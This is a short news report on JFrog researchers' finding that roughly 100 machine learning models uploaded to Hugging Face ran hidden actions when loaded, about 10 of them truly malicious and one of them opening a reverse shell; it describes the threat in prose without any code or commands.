Hugging Face, the GitHub of AI, hosted code that backdoored user devices
Enlarge (credit: Getty Images)
Code uploaded to AI developer platform Hugging Face covertly installed backdoors and other types of malware on end-user machines, researchers from security firm JFrog said Thursday in a report that's a likely harbinger of what's to come.
In all, JFrog researchers said, they found roughly 100 submissions that performed hidden and unwanted actions when they were downloaded and loaded onto an end-user device. Most of the flagged machine learning models-all of which went undetected by Hugging Face-appeared to be benign proofs of concept uploaded by researchers or curious users. JFrog researchers said in an email that 10 of them were truly malicious" in that they performed actions that actually compromised the users' security when loaded.
Full control of user devicesOne model drew particular concern because it opened a reverse shell that gave a remote device on the Internet full control of the end user's device. When JFrog researchers loaded the model into a lab machine, the submission indeed loaded a reverse shell but took no further action.